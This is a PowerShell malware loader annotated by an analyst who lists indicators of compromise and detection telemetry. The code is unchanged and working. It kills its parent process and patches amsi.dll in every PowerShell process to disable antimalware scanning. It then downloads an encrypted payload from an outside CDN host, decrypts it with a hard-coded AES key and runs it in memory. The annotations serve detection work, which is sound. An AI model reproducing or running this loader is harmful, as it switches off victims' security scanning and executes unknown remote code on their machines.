# Analyst summary (defensive annotation; statements are unchanged, only line breaks
# and comments were restored/added). The visible script runs three stages in order:
#   1. Looks up its own parent process and force-terminates it.
#   2. Compiles a P/Invoke shim (class K) and uses it to locate and overwrite bytes
#      inside amsi.dll (the Antimalware Scan Interface library) in every process
#      named "powershell".
#   3. Sets an environment variable, downloads a blob over HTTPS, AES-decrypts it with
#      a hard-coded key/IV and loads the result as a .NET assembly in memory.
# Indicators visible on this page: the download URL assigned to $palm
# (host sdfas-cloud[.]b-cdn[.]net), the environment variable BUILD=Titan, the
# hard-coded key/IV strings, and the 32-byte search pattern in $spire.
# Telemetry that would plausibly record this activity: PowerShell Script Block Logging
# (event 4104), Sysmon ProcessAccess (event 10) against powershell.exe with the
# 0x1F0FFF access mask, and an outbound connection from powershell.exe to the host above.

# --- Stage 1: parent-process termination -------------------------------------
# Resolves the parent PID of the current PowerShell process ($PID) via CIM and kills
# it if one is returned. Presumably intended to remove the launcher from the process
# tree; the launcher itself is not shown on this page.
$birch = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($birch) { Stop-Process -Id $birch -Force }

# --- Stage 2a: P/Invoke shim ---------------------------------------------------
# Add-Type compiles the C# below at run time, exposing four kernel32.dll functions
# to PowerShell as static methods on [K]: OpenProcess, ReadProcessMemory,
# VirtualProtectEx and WriteProcessMemory. Together these allow reading and
# modifying another process's memory.
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o);
    [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r);
    [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p);
    [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w);
}
"@

# --- Stage 2b: AMSI tampering routine -------------------------------------------
# For each "powershell" process: open it, find the loaded amsi.dll module, scan it
# for a fixed 32-byte sequence, and overwrite 3 bytes inside the match.
# NOTE(review): $wren and $book are never assigned in the visible text, so their
# values (and therefore the outcome of the comparison below) cannot be confirmed
# from this page; they may be defined by a wrapper that is not shown.
function KJhbhb {
    # Random 50-100 ms pauses recur between steps; presumably timing jitter.
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $creek = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    # Exits the whole script with code 1 when no matching process exists.
    if (!$creek) { exit 1 }
    foreach ($tundra in $creek) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        # 0x001F0FFF is the PROCESS_ALL_ACCESS mask; the returned handle is not
        # checked for failure and is never closed in the visible code.
        $osprey = [K]::OpenProcess(0x001F0FFF, $wren, $tundra.Id)
        $mosaic = $null
        $quartz = 0
        # Record base address and size of amsi.dll if it is loaded in the target.
        foreach ($breeze in $tundra.Modules) {
            if ($breeze.ModuleName -eq "amsi.dll") {
                $mosaic = $breeze.BaseAddress
                $quartz = $breeze.ModuleMemorySize
                break
            }
        }
        # Processes without amsi.dll loaded are skipped.
        if (!$mosaic) { continue }
        $nook = [byte[]]::new(32)
        # 32-byte pattern searched for inside the module. It resembles an x64
        # function prologue; the page does not name the function it belongs to.
        $spire = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $cove = $null
        # Walks the module in 32-byte steps, reading each window from the remote
        # process and comparing it byte-for-byte against $spire.
        for ($bay = 0; $bay -le $quartz; $bay += 32) {
            $rubble = [IntPtr]::Zero
            [K]::ReadProcessMemory($osprey, [IntPtr]($mosaic.ToInt64() + $bay), $nook, 32, [ref]$rubble)
            $veil = $book
            for ($pearl = 0; $pearl -lt 32; $pearl++) {
                if ($nook[$pearl] -ne $spire[$pearl]) { $veil = $wren; break }
            }
            # On a match, remember the address of the window and stop scanning.
            if ($veil) { $cove = [IntPtr]($mosaic.ToInt64() + $bay); break }
        }
        if (!$cove) { continue }
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $tree = 0
        # Requests protection 0x40 (PAGE_EXECUTE_READWRITE) on 0x1000 bytes starting
        # at the module base. An RWX region inside a signed system DLL is itself a
        # memory-scanning indicator.
        [K]::VirtualProtectEx($osprey, 
$mosaic, 0x1000, 0x40, [ref]$tree)
        # Overwrites the 3 bytes at offset 0x1b of the matched window (41 8b f8 in
        # $spire) with 31 ff 90. Presumably this alters the scan routine so content
        # is no longer inspected; comparing in-memory amsi.dll code with the on-disk
        # image would reveal the modification.
        $flame = [byte[]]@(0x31,0xff,0x90)
        $marsh = 0
        [K]::WriteProcessMemory($osprey, [IntPtr]($cove.ToInt64() + 0x1b), $flame, 3, [ref]$marsh)
    }
}
KJhbhb
#ujhifsfiohdf

# --- Stage 3: payload retrieval and in-memory execution ---------------------------
# setx writes a persistent user environment variable; BUILD=Titan is a host artifact
# that can be hunted for. Its purpose (campaign/build tag?) is not shown here.
setx BUILD "Titan"
# Remote location of the encrypted payload (indicator; block/alert on this host).
$palm = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin"
$nimbus = [System.Net.WebClient]::new()
# Payload bytes are held in memory only; nothing in the visible code writes them to disk.
$pine = $nimbus.DownloadData($palm)
$tropic = [System.Security.Cryptography.Aes]::Create()
# Hard-coded 32-character key (AES-256) and 16-character IV, taken as UTF-8 bytes.
# No cipher mode or padding is set, so the Aes.Create() defaults apply. Because both
# values are embedded, a captured copy of the blob can be decrypted offline for analysis.
$grain = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0")
$delta = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY")
$tropic.Key = $grain
$tropic.IV = $delta
$jewel = $tropic.CreateDecryptor()
$house = $jewel.TransformFinalBlock($pine, 0, $pine.Length)
# Assembly.Load(byte[]) loads the decrypted bytes as a .NET assembly without a backing
# file, then the assembly's entry point is invoked with no arguments. The payload
# itself is not part of this page.
$star = [System.Reflection.Assembly]::Load($house)
$eagle = $star.EntryPoint
$eagle.Invoke($null, $null)
#ujhifsfiohdf